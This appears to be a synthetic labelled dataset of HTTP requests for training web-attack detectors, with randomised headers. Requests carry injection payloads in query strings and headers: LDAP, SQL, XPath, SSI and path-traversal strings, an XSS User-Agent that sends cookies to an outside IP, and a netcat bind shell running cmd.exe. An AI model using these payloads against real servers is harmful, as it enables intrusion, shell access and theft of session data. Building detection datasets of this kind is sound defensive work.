Authorization: NTLM Y3ByYXZ0cmV1d2VmeWZscjhmZWllNTZhZm9lZW9XcmdvYmVhZEh0d25zZWhndg==
Range: 328-,-79624
Referer: http://www.oozkhdn.fr/lrnlws/Sas2tog/ncU7nWg/2hhf4I/aeehrief.bin
TE: deflate;q=0.8,deflate
Trailer: Upgrade
User-Agent: gbnT/5.1
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: 1.7 222.64.33.192, 6.7 www.hpy7al4.jpg
Transfer-Encoding: dojtaa; dWs8ttey=hozsfth
Upgrade: tSnw/7.9, a5m/6.7, fogi0/2.6, alEi/8.0
Warning: 669 www.nfgu.shtml "3kai" 
X-Forwarded-For: 251.236.113.138
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48736
Start - Id: 37092
class: LdapInjection
GET /ateErsmm4zslu.htm?u2rz47os6i2o=%29%28%7C++++%28hisd%3Doke*%29&tue63eao3ul6=rYNi HTTP/1.0
Host: www.3eeedzd.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ott2tt-ud3jl;q=0.3
Cache-Control: only-if-cached
Client-ip: 237.22.129.42
Cookie: wrc=0d|h5intteasystemusipassthru7;oghaatie7bo=u_Q0cOC;ekcqxwyXFa6x=9Rhpw6iSowh/ngeayr
Cookie2: $Version="42"
Date: Thu, 10 Sep 09 06:43:41 GMT
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: 100-continue
From: isenqanI@dizsiba.uk
If-Modified-Since: Thu, 13 Oct 05 16:55:29 UTC
If-Unmodified-Since: Mon, 25 May 09 18:29:07 UTC
If-Match: *
If-None-Match: *
If-Range: "BshOAClwwBntKUjX"
Max-Forwards: 556
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: dtwe6t qetlrdre=divi3o
Range: 087760-257003
Referer: http://wnreee8.it/t0krqil/Ftvie/ydqa3/0lliltd.txt
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 0.3; hs-oc; rv:5.9.5) Gecko/42481559
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7857x018
Via: HTTP/1.1 www.vztiai2.png:67, 5.9 www.rrTtuweh.shtml:0
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 6212465353435599462
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37092
Start - Id: 37686
class: LdapInjection
PUT /7LJW65jh/Rewaqobshisno/iW8xtermaecvdY1kjV/oi/tE1Lfuf8x-Ovc@PZ/lzdoumyitot/B0KirNa9S/Qscriptp/tCWPaOxFbNLX-b.html? HTTP/1.1
Content-Length: 97
Content-Language: iOmr,g8os
Content-Encoding: identity
Content-Location: /yjpQnbs/uo4t.jpg
Content-MD5: MnRhdVRudWFuaWxuaXJocw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 23:35:57 UTC
Last-Modified: Sat, 09 Oct 04 22:00:04 GMT
Host: www.i1otpsrur.uk:75
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: compress, compress, deflate;q=0.1
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 28.10.194.170
Cookie: qXrI-3w=a &fsam;alit=46qoNneEiqso;gmmwOSEnh=7esc;rs=ttesIgarph;udNs1aaaaxutpes=275855529;hldLewei=2GxF3T
Cookie2: $Version="503"
Date: Tue, 03 Jun 08 24:07:04 CET
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Sun, 24 Oct 04 08:48:17 GMT
If-Unmodified-Since: Tue, 07 Aug 07 12:24:47 UTC
If-Match: "a6LheQf808QtO5v"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: *
Max-Forwards: 040
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM SWlzM250b2VobmFpc3Jlb2Exb3RnaXpnaU5vYm1ucmVyYmQ5aU5FRGhzY3JqZGs=
Authorization: Digest qop=auth
Range: 6058-6,88-,-245437
Referer: http://www.ivTntioI.fr/iltii/tlzr/na62eiha/nnttop.fgf
TE: chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.7 (Windows; U; WinNT 7.2; 9m-m0; rv:5.8.2) Gecko/42105794
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 940x1719
Via: uxedy/0.9 218.222.58.30
Transfer-Encoding: identity
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 355 www.dT68.js "3Sthowaroorcrdfemtte" "Tue, 02 Mar 10 18:12:18 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a.0O93=wyqnstzlt&ePelounex=)   (    | (gtstk=ej*)&halphthspya=of'oihe(tahslj  ihr

End - Id: 37686
Start - Id: 38450
class: LdapInjection
GET /oU_KEhsJ6BOlXKF09P/m2K9mQOLu/e2oLzbYHZ2b/evRQ5/Fexec9rqyZOZjKXF/eL5@SN1sCFFrJ-GC5/WAydivC/wMMeEhLMMdUT7Ri/rn.asmx?4P9f15f7passthruVT=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&rgadhKr=lHygn5tdtao3efohi&nenn=aGrQm8_9&zlWFVvClsU=e%40Cm&uwrrl5p=ee&ntoa6dioc=o8eM%402I-lEpQ HTTP/1.1
Host: www.uraeyd.it
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=27
Client-ip: 131.162.142.41
Cookie: t3Et=08;e5tssdagnabeqr=e;NeaieRAnzImj= 1Rt;kw=1
Cookie2: $Version="35"
Date: Mon, 07 Jan 08 16:29:35 UTC
ETag: "G3Txigpimi-nkqSesa"
Expect: ntiiwopb
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Sat, 21 Mar 09 04:21:28 CET
If-Unmodified-Since: Tue, 23 Sep 08 19:26:45 GMT
If-Match: *
If-None-Match: "cRnoxUnj0znYiVH8"
If-Range: Tue, 26 Jan 10 11:04:23 UTC
Max-Forwards: 5798
MIME-Version: 3.3
Pragma: t0aetAe=hcsPsd
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest qop=xiso
Range: 86309-
Referer: http://www.6esifec.it/sihca69/ir9H/Nc8eoL/fggir.asp
TE: trailers,trailers,deflate
Trailer: If-Range
User-Agent: rrthrTb/1.7.2
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.9 67.169.5.10, rxIe/0.5 www.Rsry.jpg, FTP/8.1 www.itA3T.gif
Transfer-Encoding: identity
Upgrade: f6Ter/0.9
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38450
Start - Id: 46622
class: XSS
GET /ibvNKEOxkQ/bwHMVOfGiaQ0/bd@7/leifeOcA/l91-9m4WLvy9cDY/rte/ltha9c/snSG9laqroieleoe/9resudefgweeg/amO1fnFcsTXRTuW6.html? HTTP/1.0
Host: 26.114.57.96
Connection: nasr8
Accept: application/postscript, application/*, text/plain;q=0.1
Accept-Charset: big5;q=0.1, x-mac-korean, cp-932;q=0.5, windows-1254;q=0.1, iso-8859-8-i;q=0.6
Accept-Encoding: *
Accept-Language: qlyax-r, sr0ane7-9, eirlY-y
Cache-Control: no-store
Client-ip: 160.17.79.235
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="51"
Date: Fri, 05 Mar 04 13:04:20 UTC
ETag: W/"Sh4v0LOFPRUKRUrK"
Expect: 100-continue
From: ibrMts@nvsrs.biz
If-Modified-Since: Tue, 13 Jan 09 05:36:30 CET
If-Unmodified-Since: Wed, 19 Sep 07 04:45:37 CET
If-Match: "E1g3EB@jpF33Xko_2PjU"
If-None-Match: "nYXipAq9GzBps-YFe"
If-Range: "a8ALukMNxImmvzcX"
Max-Forwards: 570
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest username="anztewo"
Authorization: NTLM aWJpZTlsc2lta2FlOVdzdHJyaGFlYXRpbHBub0Vtb3pDdGc=
Range: 7283-8
Referer: /ftrTH1tg/eoe7hpe.bin
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: <img    src   = "    livescript:[window.open('http://12.101.111.21/erse.asmx'+document.cookie);]       "   >
UA-CPU: 68000
UA-Disp: 905,409,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: FTP/5.9 74.134.254.141, 7.7 172.180.171.6, 8.1 www.ld2b.js
Transfer-Encoding: gzip
Upgrade: edw/7.9, a9aldo/9.4, p2zc/2.5, sti/1.5
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 151.204.29.132
X-Serial-Number: 1432096438737342
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46622
Start - Id: 38578
class: LdapInjection
GET /oyroheiidohdeoenRIng/rd1vb/psst89ooesur/ldstofwlsnrervw/gm94HOloqb3Me/c7o0bi/eP/mpOCadmin.jsp?uco9tprekoitoth=87%29%28%26%28objectClass%3Deit%29%28%7C%28sn+%3D++++alwo%29%28cn%3Dp5ai+++++J*%29%29&2n=8qH40p&ytershRie1cnex=tnehZOmformreplaceOEai38 HTTP/1.1
Host: www.tscroetanH.fr:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-6;q=0.6, big5;q=0.2
Accept-Encoding: compress, identity, compress;q=0.1, identity, gzip
Accept-Language: *;q=0.4
Cache-Control: j8ngia9Z='gea7isar'
Client-ip: 231.216.109.79
Cookie: ln=uIeodtcaoD1matee;ohttpopen4FXVCoptqboot.iniE=3284;UQtL4qPUUzo=5;2rYn=1n99steneayel;13ZpM=i4J;Hnce2ia2uti=nin
Cookie2: $Version="987"
Date: Sun, 30 Dec 07 06:54:29 GMT
ETag: W/"INs.rY_u52VqhZ3fN"
Expect: UpT3s
From: sntdhp@rvsirrEwfi.it
If-Modified-Since: Thu, 04 Mar 10 03:22:05 UTC
If-Unmodified-Since: Sat, 03 Apr 10 02:00:47 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 20:22:44 UTC
Max-Forwards: 88
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic YXRkdzJsSXI6ejJ0Zmlp
Authorization: Basic ZThzc2w6YmUzYUV0ZQ==
Range: -5
Referer: http://www.eMe2y.de/tacUer/5csde/ajsdh.jpg
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: h2t2xL http://www.5damh2.biz
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 639x8095
Via: FTP/1.2 153.237.119.41
Transfer-Encoding: identity
Upgrade: ksu/7.2, ear/3.1
Warning: 767 180.228.227.71 "tniR" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38578
Start - Id: 35320
class: SqlInjection
GET /entndos9edwn.js?Wewt9ez0Hstpon=giperlP&aaeOdin=N1RsBtarot6se&9InseOjTirM0tai=%27+++++or+++id++in+++++%28++select+++++*++++from++++++user_db+%29&onbaTi=cln&erlIntto=sc3nr&y4R5-zWd1=Eiuh&8waa=feieve4tn HTTP/1.0
Host: www.gr6al8iNte.de:5653
Connection: close
Accept: text/*, text/*;q=0.2, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 89.110.200.190
Cookie: tndee1ic6e=54;yeoHs1pFzi=47
Cookie2: $Version="53"
Date: Thu, 19 Nov 09 05:41:45 CET
ETag: W/"mz5K4DQH@Xm5ZhfU4"
Expect: 100-continue
From: tS3pEo@br4n.it
If-Modified-Since: Sun, 30 Nov 08 22:21:17 CET
If-Unmodified-Since: Thu, 28 Jul 05 09:37:58 CET
If-Match: "aWu0yGrm3AYZHG-Shd0"
If-None-Match: *
If-Range: *
Max-Forwards: 876
MIME-Version: 4.0
Pragma: a='6ode'
Proxy-Authorization: Digest nc=0A24AbAd
Authorization: Basic cnVkeWRvZWY6bjBjZXR0
Range: 9898-,30840-71
Referer: /ancnt/6eLaoro/neefgtr2/inaeuie.jsp
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.0 (X11; U; Linux i586 1.2; nm-dy; rv:7.4.0) Gecko/93088882
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 198x9357
Via: 0.8 www.4lhAim.tiff, HTTP/8.0 www.aotgt.shtml, HTTP/4.2 www.moei.js
Transfer-Encoding: rYIn6e; anQLe=jgtermi
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35320
Start - Id: 49976
class: XPathInjection
GET /allwindow.openhttpsIQ/oR_6IqFL/hon2te5getw/rentnenu9rireea8/eV5qZmxfQ_/e3_CgZ/wSfcQVxygg7zZ9E6xF/MTOK-dI.shtml?SLusrM=s%7Ct%5Cbgsoundsaitn%3Dmi8di%3Di&5klSqbktmpA=qont&emboeereiti37e=807&ta=4948117&yea1otor=nQa&DXOpE=414&ocnlad3hiz3u=9+or+rwoa%2FnppylO%2Ft%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D++or+++27761%3D HTTP/1.1
Host: www.aOeeoscc.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-8859-9
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 213.241.64.40
Cookie2: $Version="372"
Date: Thu, 22 Apr 10 15:49:18 UTC
ETag: W/"j_9d8nENb2Gi6G5"
Expect: etuerprO
From: aihryej@wvtazei.be
If-Modified-Since: Fri, 06 Oct 06 02:54:24 CET
If-Unmodified-Since: Sun, 28 Feb 10 01:10:20 UTC
If-Match: "NCIoqX_liYB_xXW107AD"
If-None-Match: *
If-Range: Tue, 13 Mar 07 14:25:03 UTC
Max-Forwards: 774
MIME-Version: 0.0
Pragma: pshua9=b
Proxy-Authorization: Digest response="CC5E7EdEafE81B3DBCeA5a5BbFE19b80"
Authorization: Basic c2huZTp1bWl0OG8z
Referer: /oTrv.mpeg
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/3.5 (X11; U; Open BSD i586 9.2; me-ay; rv:9.2.4) Gecko/61781261
UA-CPU: 68000
UA-OS: Linux
Via: 9xss/2.8 www.eteYr.png, evto/4.1 www.nqdee.jpg
Transfer-Encoding: identity
Warning: 373 www.dycegetI.js "ud0n" "Sun, 04 May 08 18:18:10 CET"
X-Serial-Number: 6790519632
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49976
Start - Id: 43173
class: OsCommanding
GET /sgf4-T/sv25yeMfbMGCggWYS/iuOahgn2tUe.jpg?5mnnaa2oRiii=x+8bsske&ehioh5bed=06364&ym=%3D9u&aennohsi=0903659&O7iGnxy57H=%250Axterm++-display+++++www.reic.com%3A0.0&ceap=%29smmhs&zt47tl=tocretrhe&69ZX=stelnetd%5Diie6eoo&hd1frls8egut=s+bin&devNrdedtoiA=149150&wJ@oboot.iniXZevalrU8C=066520469&oitialoeaHal=kykE3Be_rFQ&kteiuEi=ut5e3Nechs8%28v3r HTTP/1.1
Host: 33.242.113.242
Connection: soisede
Accept: application/*, text/html, image/*
Accept-Charset: cp-932;q=0.0, euc-jp;q=0.9, koi8-r
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 174.7.46.175
Cookie: LuCwgetPjobject=13630872;Oqetoo=123;fmspsvearriNn=ublslibAxmlnunceexec;Txpca3yv5=lR8BbIS;SZOS.SXPIZ=baeiao;otAooHatle=taho
Cookie2: $Version="045"
Date: Thu, 26 Nov 09 19:32:28 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Fri, 05 Mar 10 06:21:51 GMT
If-Unmodified-Since: Fri, 17 Jun 05 19:30:21 CET
If-Match: "EGW_uXyBFzbUOj1Awf3"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: *
Max-Forwards: 921
MIME-Version: 6.0
Pragma: a7r20='al'
Proxy-Authorization: coloIh rs8x9a=2Iwcett
Authorization: znYa noqoerfi=esinoiNr
Range: 332370-1588,656-95
Referer: http://6ytyhe.org/DCxtcVS.js
TE: gzip
Trailer: Max-Forwards
User-Agent: e6dd/2.1.2.8.7
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 7.1 www.ssttlemo.jpeg
Transfer-Encoding: qrcQeh
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 815 www.lhtmc.jpeg "22sybrstoc" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43173
Start - Id: 35887
class: XPathInjection
GET /h-Ac0Xboot.iniD.hoJ/azTg1M/tClI9bo@681Kyu4/wcuttHS/4PxYsamx/nc./nnphRF2CzvsAr/jE8-WOCR.wNt7L7EKFG.css?tGnreet=%3F&eatZviyribcbeE=atiipmb%27++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++++%27toe1%27%3D++%27 HTTP/1.1
Host: www.e2Sa5eaqt.net
Connection: close
Accept: video/*;q=0.6, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: min-fresh=990
Cookie: mre=5;cont6eloln0XLn=tht
Cookie2: $Version="56"
Date: Wed, 23 Jul 08 01:27:13 GMT
If-Modified-Since: Wed, 21 Feb 07 18:09:35 CET
If-Unmodified-Since: Fri, 06 May 05 12:47:11 CET
If-None-Match: *
If-Range: "fpz47uRVd5n1F2N"
Max-Forwards: 6309
Pragma: no-cache
Range: 611-037
Referer: http://hvrbfdDi.org/7lnehr/eosI/Rtnrtaa/liehna.js
TE: gzip;q=0.5,trailers,chunked;q=0.9
User-Agent: toslsci (t5Bh@zlH; eeXj95R60c; xzL2iyD; x6bQAXb)
UA-OS: Linux

null

End - Id: 35887
Start - Id: 45479
class: PathTransversal
GET /aMsE_ETX9lr0wGrh/x5mHF/seameq00.jpeg?oainifOepmn=697&cwaiOacnmeu=7r+lnkm&JlvBPQLtH=%5CWINDOWS%5Csystem.ini&tmo=sTpYasRExn.R&eena1t=o.kRg_BYzd&ot0rmmce4rltger=PuioLame&osdum9tye=u8hawj&ruatea8jetFt1o=153148 HTTP/1.0
Host: www.hwshy.it:80
Connection: rxm1f1ht
Accept: video/quicktime;q=0.6, image/jpeg, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 53.223.189.118
Cookie: secnicreeaost=tF;eeneruyhntdsr=yhae;hwo=4382169;SlE=OwaT0a1teameojoirt
Cookie2: $Version="01"
Date: Sat, 10 May 08 16:43:23 UTC
ETag: "u_g0XiWobOrZHoGp"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Sun, 31 Dec 06 20:05:24 GMT
If-Unmodified-Since: Thu, 16 Sep 04 12:26:43 GMT
If-Match: ".-nOFd-GJL1G6Xj5"
If-None-Match: "f1FQh7EwzZnLTMGpX8"
If-Range: Fri, 13 Oct 06 02:36:22 CET
Max-Forwards: 682
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="hesa"
Authorization: Basic YWVoaGlvZDpyY21iaWV0bw==
Range: 7-
Referer: /eg4iysbm/aihon/tcegsTme/it73ea/Klmdsu.js
TE: trailers
Trailer: Referer
User-Agent: teie77NO0
UA-CPU: x86
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: FTP/2.9 223.210.147.184, FTP/5.7 www.dgESoui.png, 7.6 www.bo3t0es.jpg
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45479
Start - Id: 39754
class: SSI
GET /cCF.aXKXPDm/epxa/cLKl9Yl.QcaTUW15dHpw/h9-sa4l@_K/lEs6@p6fZLYGX/cl-10/U3vFMprcpV3/77eMBY88WcVT33tgaboO/uUtiremm/lJVnM5t0LxAWwfqz/FQscriptBB4rjhttpXxG1P-.bin?rt=%3C%21--++++%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&foeibIbysneCosg=ftpptu&agxhElyt=i+7xconnectnOce%7Cd&wp-.OFUvmk2jx=8092&Aotjaeiotnhs=3115476252&gtnoem=1hr&ssespily3=gciepslE-8ne&i3trid3yyT=+lt+%24&ye=phpysUkg HTTP/1.0
Host: www.l4gieassuL.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: p-k;q=0.5, o-eotfk;q=0.1, R0holR7-dtr6;q=0.2, 9eftr-r
Cache-Control: max-age=188
Client-ip: 122.119.15.78
Cookie: 8i= ;6obmmIntzRm= \1-ingm;thtanemtlxesl=4
Cookie2: $Version="098"
Date: Thu, 28 Feb 08 16:55:51 GMT
ETag: W/"T6v1gOR1o6OyhoM"
Expect: 7atT=ybaN
From: ls8tIstr@r3edte.de
If-Modified-Since: Tue, 15 Mar 05 16:54:34 CET
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: *
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.3
Pragma: cOrai=iXLpec
Proxy-Authorization: Digest algorithm=rOwsg8ds
Authorization: lO6Soh rrse=ltmytu8
Range: 85-,34121-
Referer: /oldedo3.pdf
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: lfot (s3KQ.z4a-; 0hln7_x; n3qFRi_6; yG9G_.Lz28; 6pG_L@pj)
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 6.4 224.169.35.54
Transfer-Encoding: identity
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39754
Start - Id: 42848
class: OsCommanding
GET /aQhHSyN/uA/mhfsiesB/cBzn/7D/6..cfm?B_Gor=%7C++shell%28+++++%22cmd+%2Fc++c%3AInetpubwwwrootMSISSnc.exe++++-l+++-p+++++6604+++-t+-e++++cmd.exe++++%22+++%29%7C+%27&UQRJ4K9=te%25Tex%3Dtetc%24 HTTP/1.0
Host: www.ngsdidkle.fr
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.8, compress;q=0.2, deflate;q=0.2
Accept-Language: *
Cache-Control: f6s=madro
Client-ip: 143.230.118.47
Cookie: 8AOopenaphpm89=(uthc wt3I4e;IkUgklU0=1;hh7s8=tLc;bdntnoen8cigs6e=28;pasze6thgnewns=948383
Cookie2: $Version="840"
Date: Tue, 20 Jan 04 08:11:37 UTC
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 07 Jan 10 15:45:26 UTC
If-Unmodified-Since: Mon, 05 Sep 05 20:53:22 GMT
If-Match: "APn_FheDimUModWFJ"
If-None-Match: "Z6GEjEtI2dmmmnOy10A"
If-Range: "ZiEy-bnA8m1M4OmNB"
Max-Forwards: 65
MIME-Version: 7.9
Pragma: sngnjh5='tagt7f'
Proxy-Authorization: njdei gtdN=st7gs
Authorization: ashu aliHe=hEgi
Range: -885,-18051
Referer: http://www.Sroitupt.ch/ctwilnm/ddie/zrnoswr/8trn.jpg
TE: chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (X11; U; Linux i586 6.7; or-uc; rv:3.5.9) Gecko/47042701
UA-CPU: Sparc
UA-Disp: 7817,3346,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 625x3364
Via: 8.5 100.201.44.244
Transfer-Encoding: compress
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 831 253.234.94.229 "urhmxsr8a0ucgtYcTaym" "Thu, 10 Mar 05 12:24:31 GMT"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42848
Start - Id: 49788
class: XPathInjection
GET /eDkU--r6P/eqU3wmuu/oL0yc-mniQw/hte4o3drbhuFn/LqXI1B/hq2Uog1g21vstldTk/sd/arA5cnt6gtipuktao/eVX9ybSRxdkQW66J5.php3?ett=cat7ii++netcat+nnh%3Bshutdownw&wDe=1Eajo&2ooiotoioo=shtau%27++or+%28i+++%3C++++count%28ohl0%2Fchild%3A%3Atext%28%29%29++++and+++j++++%3C++count%28dTo%2Fchild%3A%3Acomment%28%29%29++++and+++k+++++%3C+++++count%28viyWha%2Fchild%3A%3A*%29++++%29++or+++++%27trailH%27++%3D++%27++aaSjk%27++or&ssqeayfo=a%7Ce%27g HTTP/1.1
Host: www.aimfote1.fr
Connection: waoFna
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, identity;q=0.6, identity, compress, compress;q=0.7
Accept-Language: *
Cache-Control: max-age=33
Client-ip: 136.54.232.161
Cookie: ss64Rtrls9tr05=a13vnwiopqtfi;uhulvdttlo2ey=rt3xse;eHl2=3;etLt9sindddFi=ri;isutrgsawoecw=1m8iwp-like?n]5wds&n|0 
Cookie2: $Version="615"
Date: Fri, 21 Mar 08 11:23:26 GMT
ETag: W/"8Nw-K59c314vRFuXk"
Expect: 100-continue
From: terol@hDey.ch
If-Modified-Since: Wed, 13 Jun 07 22:12:45 GMT
If-Unmodified-Since: Tue, 16 Jan 07 03:39:54 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Oct 07 21:18:55 UTC
Max-Forwards: 82
MIME-Version: 5.9
Pragma: em='wum'
Proxy-Authorization: Digest nonce
Authorization: Digest response="08D7A35b101810eF24FFD46Cd397A01b"
Range: 800674-0,376-429,12-
Referer: /Kcrnln/hwhad/y6scee/S0z0rx/pBtfpo.sh
TE: trailers,gzip;q=0.9,chunked;q=0.7
Trailer: Authorization
User-Agent: egroim (hWPmhkStAg; oI7mOt; pcJViB)
UA-CPU: Sparc
UA-Disp: 662,518,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 742x2872
Via: FTP/6.5 www.nimesa.html:2621, 0.5 197.30.128.133, FTP/2.1 www.rynva.shtml
Transfer-Encoding: lsmlfc; 1fe5=tteivt
Upgrade: afn/1.9, wee/7.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 13614993900789849
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49788
Start - Id: 45818
class: PathTransversal
GET /9UUy.5etc5.Zk/lXySS9la4iC7gUD/tv/c-unrdn/aak3aiyguroIMss/htacceslogKZOtel/ow@mOmeItbF/epwws.mspx?B2ptFtwrmgWEh3s=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.0
Host: www.rrcsg8N4no.ch
Connection: keep-alive
Accept: text/*, text/*, audio/*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: lnyp-pr2r, ou-orsawcs;q=0.2
Cache-Control: on='8d2nrJ5'
Client-ip: 117.199.144.252
Cookie: lsxdlusja=6481823
Cookie2: $Version="335"
Date: Wed, 16 Jul 08 01:56:17 GMT
ETag: W/"UeVdKYywRQ.A6wz"
Expect: 100-continue
From: rpAl@yhsq9eT1.st
If-Modified-Since: Sun, 18 Apr 10 10:38:35 GMT
